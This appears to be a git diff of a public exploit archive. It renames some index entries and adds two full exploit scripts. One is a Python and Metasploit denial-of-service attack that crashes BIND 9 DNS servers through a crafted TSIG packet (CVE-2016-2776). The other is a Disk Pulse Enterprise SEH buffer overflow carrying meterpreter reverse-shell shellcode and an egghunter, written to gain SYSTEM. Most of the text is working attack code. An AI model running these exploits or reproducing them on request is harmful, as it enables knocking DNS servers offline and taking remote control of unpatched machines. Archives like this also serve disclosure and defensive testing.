+35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 35068,platforms/hardware/remote/35068.txt,"pfSense - pkg_edit.php id Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35069,platforms/hardware/remote/35069.txt,"pfSense - pkg.php xml Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35070,platforms/hardware/remote/35070.txt,"pfSense - status_graph.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 @@ -31696,7 +31696,7 @@ id,file,description,date,author,platform,type,port 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution",2014-10-27,Vulnerability-Lab,ios,webapps,1861 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 -35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 +35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 @@ -32383,7 +32383,7 @@ id,file,description,date,author,platform,type,port 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 -35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 +35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 @@ -32519,7 +32519,7 @@ id,file,description,date,author,platform,type,port 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0 35965,platforms/php/webapps/35965.txt,"Joomla! Component com_resman - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0 -35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0 +35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 @@ -32589,7 +32589,7 @@ id,file,description,date,author,platform,type,port 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 -36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 +36070,platforms/php/dos/36070.txt,"PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36061,platforms/php/webapps/36061.php,"WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 @@ -32960,7 +32960,7 @@ id,file,description,date,author,platform,type,port 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 -36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0 +36443,platforms/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0 36444,platforms/php/webapps/36444.txt,"WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0 36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 @@ -32999,6 +32999,7 @@ id,file,description,date,author,platform,type,port 36487,platforms/php/webapps/36487.txt,"WordPress Plugin Comment Rating 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 +40453,platforms/multiple/dos/40453.py,"Bind 9 DNS Server - Denial of Service",2016-10-04,Infobyte,multiple,dos,53 36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 @@ -35874,8 +35875,8 @@ id,file,description,date,author,platform,type,port 39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 -39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 -39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 +39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 +39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0 39558,platforms/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80 @@ -35984,7 +35985,7 @@ id,file,description,date,author,platform,type,port 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80 -39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80 +39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80 39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,windows,local,0 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80 @@ -36570,3 +36571,4 @@ id,file,description,date,author,platform,type,port 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0 +40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80 diff --git a/platforms/multiple/dos/40453.py b/platforms/multiple/dos/40453.py new file mode 100755 index 000000000..37ff5616e --- /dev/null +++ b/platforms/multiple/dos/40453.py @@ -0,0 +1,201 @@ +import socket +import struct + +TARGET = ('192.168.200.10', 53) + +Q_A = 1 +Q_TSIG = 250 +DNS_MESSAGE_HEADERLEN = 12 + + +def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): + query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01" + + sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 + tsig_rr = build_tsig_rr(sweet_spot) + + return query_A + tsig_rr + +def int16(n): + return struct.pack("!H", n) + +def build_tsig_rr(bind_demarshalled_size): + signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09" + "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00") + tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00" + + necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields) + necessary_bytes += 2 + 2 # length fields + + # from sizeof(TSIG RR) bytes conforming the TSIG RR + # bind9 uses sizeof(TSIG RR) - 16 to build its own + sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16) + + tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields + tsig_data = algo_name + signature_data + return tsig_hdr + int16(len(tsig_data)) + tsig_data + +def generate_padding(n): + max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d] + buckets = [1] * len(max_per_bucket) + + min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte + max_size = sum(max_per_bucket) + len(buckets) + 2 + + if not(min_size <= n <= max_size): + raise RuntimeException("unsupported amount of bytes") + + curr_idx, n = 0, n - min_size + while n > 0: + next_n = max(n - (max_per_bucket[curr_idx] - 1), 0) + buckets[curr_idx] = 1 + n - next_n + n, curr_idx = next_n, curr_idx + 1 + + n_padding = lambda amount: chr(amount) + "A" * amount + stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00" + + return stringify(buckets[:4]), stringify(buckets[4:]) + +if __name__ == "__main__": + bombita = build_bind_nuke() + + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.sendto(bombita, TARGET) + s.close() + +''' +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'timeout' +require 'socket' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'BIND 9 DoS CVE-2016-2776', + 'Description' => %q{ + Denial of Service Bind 9 DNS Server CVE-2016-2776. + Critical error condition which can occur when a nameserver is constructing a response. + A defect in the rendering of messages into packets can cause named to exit with an + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed + to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2776' ], + [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] + ], + 'DisclosureDate' => 'Sep 27 2016', + 'DefaultOptions' => {'ScannerRecvWindow' => 0} + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def check_server_status(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(valid_query, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end + + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end + end + + def scan_host(ip) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + check_server_status(ip, rport) + end + + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + get_domain = domain+org + end + + def payload + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x01" # Additional RRs: 1 + + # Doman Name + query += get_domain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001) + + # Aditional records. Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query += "\x00" + + query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query += "\x00\xff" # Class: ANY (0x00ff) + query += "\x00\x00\x00\x00" # Time to live: 0 + query += "\x00\xfc" # Data length: 252 + + # Algorithm Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query += "\x00" + + # Rest of TSIG + query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query += "\x01\x2c" # Fudge: 300 + query += "\x00\x10" # MAC Size: 16 + query += Rex::Text.rand_text_alphanumeric(16) # MAC + query += "\x8f\x65" # Original Id: 36709 + query += "\x00\x00" # Error: No error (0) + query += "\x00\x00" # Other len: 0 + end + + def valid_query + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x00" # Additional RRs: 0 + + # Doman Name + query += get_domain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001)s + end + +end +''' diff --git a/platforms/unix/remote/22442.c b/platforms/unix/local/22442.c similarity index 100% rename from platforms/unix/remote/22442.c rename to platforms/unix/local/22442.c diff --git a/platforms/windows/remote/40452.py b/platforms/windows/remote/40452.py new file mode 100755 index 000000000..e5f96d630 --- /dev/null +++ b/platforms/windows/remote/40452.py @@ -0,0 +1,93 @@ +#!/usr/bin/python + +print "Disk Pulse Enterprise 9.0.34 Buffer Overflow Exploit" +print "Author: Tulpa // tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa-security.com + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Greetings to ozzie_offsec and carbonated +#Special Shoutout to unfo- for making me look closer + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.132',80)) + +#bad chars \x00\x0a\x0d\x26 + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + +buf = "" +buf += "\xda\xd9\xba\x43\x1b\x3f\x40\xd9\x74\x24\xf4\x58\x2b" +buf += "\xc9\xb1\x47\x31\x50\x18\x03\x50\x18\x83\xc0\x47\xf9" +buf += "\xca\xbc\xaf\x7f\x34\x3d\x2f\xe0\xbc\xd8\x1e\x20\xda" +buf += "\xa9\x30\x90\xa8\xfc\xbc\x5b\xfc\x14\x37\x29\x29\x1a" +buf += "\xf0\x84\x0f\x15\x01\xb4\x6c\x34\x81\xc7\xa0\x96\xb8" +buf += "\x07\xb5\xd7\xfd\x7a\x34\x85\x56\xf0\xeb\x3a\xd3\x4c" +buf += "\x30\xb0\xaf\x41\x30\x25\x67\x63\x11\xf8\xfc\x3a\xb1" +buf += "\xfa\xd1\x36\xf8\xe4\x36\x72\xb2\x9f\x8c\x08\x45\x76" +buf += "\xdd\xf1\xea\xb7\xd2\x03\xf2\xf0\xd4\xfb\x81\x08\x27" +buf += "\x81\x91\xce\x5a\x5d\x17\xd5\xfc\x16\x8f\x31\xfd\xfb" +buf += "\x56\xb1\xf1\xb0\x1d\x9d\x15\x46\xf1\x95\x21\xc3\xf4" +buf += "\x79\xa0\x97\xd2\x5d\xe9\x4c\x7a\xc7\x57\x22\x83\x17" +buf += "\x38\x9b\x21\x53\xd4\xc8\x5b\x3e\xb0\x3d\x56\xc1\x40" +buf += "\x2a\xe1\xb2\x72\xf5\x59\x5d\x3e\x7e\x44\x9a\x41\x55" +buf += "\x30\x34\xbc\x56\x41\x1c\x7a\x02\x11\x36\xab\x2b\xfa" +buf += "\xc6\x54\xfe\x97\xc3\xc2\xc1\xc0\xb7\x92\xaa\x12\x48" +buf += "\x83\x76\x9a\xae\xf3\xd6\xcc\x7e\xb3\x86\xac\x2e\x5b" +buf += "\xcd\x22\x10\x7b\xee\xe8\x39\x11\x01\x45\x11\x8d\xb8" +buf += "\xcc\xe9\x2c\x44\xdb\x97\x6e\xce\xe8\x68\x20\x27\x84" +buf += "\x7a\xd4\xc7\xd3\x21\x72\xd7\xc9\x4c\x7a\x4d\xf6\xc6" +buf += "\x2d\xf9\xf4\x3f\x19\xa6\x07\x6a\x12\x6f\x92\xd5\x4c" +buf += "\x90\x72\xd6\x8c\xc6\x18\xd6\xe4\xbe\x78\x85\x11\xc1" +buf += "\x54\xb9\x8a\x54\x57\xe8\x7f\xfe\x3f\x16\xa6\xc8\x9f" +buf += "\xe9\x8d\xc8\xdc\x3f\xeb\xbe\x0c\xfc" + +#pop pop ret 1001A333 + +nseh = "\x90\x90\xEB\x0B" +seh = "\x33\xA3\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 12292 #subtract/add for payload +evil += "w00tw00t" +evil += "\x90" * 20 +evil += buf +evil += "\x90" * 50 +evil += "\x42" * 1614 +evil += nseh +evil += seh +evil += "\x90" * 20 +evil += egghunter +evil += "\x90" * 7000 + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() +